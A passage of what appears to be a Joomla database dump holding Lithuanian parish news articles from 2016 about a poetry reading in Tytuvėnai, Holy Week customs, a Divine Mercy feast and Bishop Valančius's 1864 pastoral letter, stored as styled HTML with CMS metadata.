Popiežiaus atvaizdu, antspauduotas Pontifiko antspaudu patvirtintas parašu, surašytas Vatikane 1933 metais.</span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Katalikų bažnyčia suteikia unikalią galimybę ypatingomis progomis gauti neeilinę dovaną-liudijimą, kuris įamžiną įsimintinus gyvenimo įvykius.</span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Parengė Rūta Krencienė</span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"> </span></span></p>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><img src=\"images/stories/naujienos/laiko_zenklai/2016 eksponatai 021.jpg\" border=\"0\" alt=\"\" width=\"405\" height=\"572\" /></td>\r\n<td><img src=\"images/stories/naujienos/laiko_zenklai/2016%20eksponatai%20032.jpg\" border=\"0\" width=\"773\" height=\"543\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>',1,0,0,44,'2016-02-01 07:39:00',135,'','2016-03-25 06:29:19',135,0,'0000-00-00 00:00:00','2016-02-16 07:39:00','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/laiko_zenklai\\/laiko zenklai.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',24,0,117,'','',1,3341,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(263,351,'Poezijos skaitymai Tytuvėnuose ','skaitymai','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Pačioje žiemos pabaigoje ankstesniais metais, o šiemet pačioje pavasario pradžioje, per šv. Kazimierą, į Tytuvėnų bernardinų vienuolyną, į POEZIJOS SKAITYMUS renkasi jos mylėtojai ir gerbėjai, o gal ir smalsuoliai pavargę nuo žiemos sąstingio. <br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=300}stories/naujienos/poezijos_skaitymai_16/pic{/gallery}</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Poezijos skaitymai sumanyti ir rengiami kunigui Ričardui Mikutavičiui pagerbti, pirsiminti, nes būtent Tytuvėnuose prasidėjo jo kaip poeto kelias.</span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Ankstesniuose susitikimuose buvo skaitomos R. Mikutavičiaus eilės, o šiėmet norėjosi pokyčių. Į skaitymus pakvietėme aktorę, rašytoją, Marijos Radijos balsą-savanorę Doloresą Kazragytę. Aktorė pasirinko skaityti iš kun. Ričardo Mikutavičiaus poezijos rinkinio “Poterių upė”. Ji pristatė klausytojams kun. Arūno Peškaičio OFM eilėraščius iš knygos “Bandymai” ir kun. Vytauto Stepono Vaičiūno OFS kūrybą iš knygos “Pažvelk dievybei į akis”.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Poezija – paukštė laisvūnė prasidedanti iš įsižiūrėjimo, įsimąstymo, minčių nuotrupų, klausimų be atsakymų, vidinio ilgesio ir galybių galybės- vaizduotės.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Doloresa Kazragytė pastebėjo, kad dvasiškių kūryba visados paženklinta liūdesio šešėliu, kad ją skaityti net ir profesionaliai aktorei yra iššūkis. Buvo sulaužytos tradicijos, nes tarp poezijos eilučių įsiterpė nepakartojamos patirtys ir neįprasti liudijimai iš Šventosios Žemės.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tad paukštė laisvūnė – poezija ir kitąmet laukiama po senojo vienuolyno skliautais.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">VšĮ „Tytuvėnų piligrimų centras“<br /><br /><br /><br /><br /><br /><br /><br style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\" /></span></p>',1,0,0,44,'2016-03-15 13:45:17',135,'','2016-03-15 13:47:17',135,0,'0000-00-00 00:00:00','2016-03-15 13:45:17','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/poezijos_skaitymai_16\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,116,'','',1,3384,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(264,352,'Didžioji savaitė','didzioji-savaite','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Prasidėjusi Didžioji savaitė, dar vadinama Velykine, Tyliąja ar Laukimo, ir seniau ir dabar nuspalvinta ypatinga ruoša. Žinoma, ir ypatinga nuotaika; jos metu negalima bartis, ginčytis, pyktis, kam nors pavydėti. Negalima ir ką nors skolintis arba kitam skolinti – laimė išeisianti iš namų...primena senieji papročiai.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=300}stories/naujienos/didzioji_savaite{/gallery}</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Ketvirtadienį Bažnyčia mini Eucharistijos įsteigimą Velykų vakarienėje, Jėzaus su mokiniais valgytoje Jeruzalėje. Mišių pradžioje, primenant Eucharistijos sakramento įsteigimą, „Garbė Dievui aukštybėse\" giedama labai iškilmingai, skambant visiems varpams. Tačiau himnui pasibaigus, varpus apgaubia gedulo tyla; jie nebekvies į jokias pamaldas dvi tolesnes dienas, kuriomis minima Viešpaties Kančia ir mirtis. Bažnyčia įžengia į kontempliacijos tylą; ji nutraukia liturginę veiklą iki pat Velyknakčio didžiosios vigilijos.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Bažnyčiose nutilus varpams ir vargonams  tik kartą metuose, lyg plaktukų tuksenimas pasigirsta kleketų ir tarškynių garsas.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Nuotraukose Tytuvėnų bažnyčioje naudojami kleketai ir nebenaudojamos tarškynės – viena sukama, kita stumiama.<br /><br /><br /><br /><br /><br /><br /><br /><br style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\" /></span></p>',1,0,0,44,'2016-03-25 06:27:10',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2016-03-25 06:27:10','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/laiko_zenklai\\/laiko zenklai.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,115,'','',1,3373,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(265,353,'Dievo Gailestingumo šventė','dievo-gailestingumo-svente','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tradicinė Dievo Gailestingumo savaitė ypač svarbi šiais metais švenčiant popiežiaus Pranciškaus paskelbtą Ypatingąjį gailestingumo jubiliejų. Tytuvėnų parapijos  Dievo Gailestingumo maldos grupė pakvietė miestelėnus paminėti šį jubiliejų. </span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Į šventę buvo atvykusios ir seserys benediktinės iš Kauno. Po Šv. Mišių dalyviai susirinko vienuolyno bibliotekos salėje į agapę.</span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=300}stories/naujienos/dievo_gailestingumo_svente{/gallery}</span></span></span></p>',1,0,0,44,'2016-04-07 13:01:30',135,'','2016-04-07 13:04:34',135,0,'0000-00-00 00:00:00','2016-04-07 13:01:30','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/dievo_gailestingumo_svente\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,0,114,'','',1,3111,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(267,355,'Ganytojiškas laiškas','ganytojiskas-laiskas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Vyskupas Motiejus Valančius (1801-1875) Ganytojiškas laiškas 1864 m. popierius, rankraštis, lietuvių kalba, 37,5x24cm, 2 lapai. <br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=300}stories/naujienos/ganytojo_laiskas{/gallery}</span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Šiemet sukanka 215 metų, kai gimė vyskupas Motiejus Valančius.</span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Pristatome Motiejaus Valančiaus ganytojišką laišką skirtą Tytuvėnų tikintiesiems. Laiškas parašytas tuometine kalba, neįprastu raidynu.</span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Vyskupas savo užrašus, laiškus, kūrinius rašė ir skelbė ne tik lenkiškai, bet ir lietuviškai – tai didelė naujovė to meto visuomenėje. Lietuvių kalba skaitė pamokslus, ragino taip elgtis kitus, todėl Valančiaus laikais ši praktika labai išplito. Laiško gale visada būdavo vyskupo prisakymas: „Szita mana grometa parskaitis kunigaj zmonims isz ambones par dwi pagreczes szwentes“ kaikur dar pridurdavo „...su pamokslajs prigulincziais“ Ir laiške tytuvėniškiams lenkiškai pieštuku pažymėta- perskaityti iš sakyklos.</span></span></p>',1,0,0,44,'2016-04-24 18:19:09',135,'','2016-04-24 18:21:37',135,0,'0000-00-00 00:00:00','2016-04-24 18:19:09','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/laiko_zenklai\\/laiko 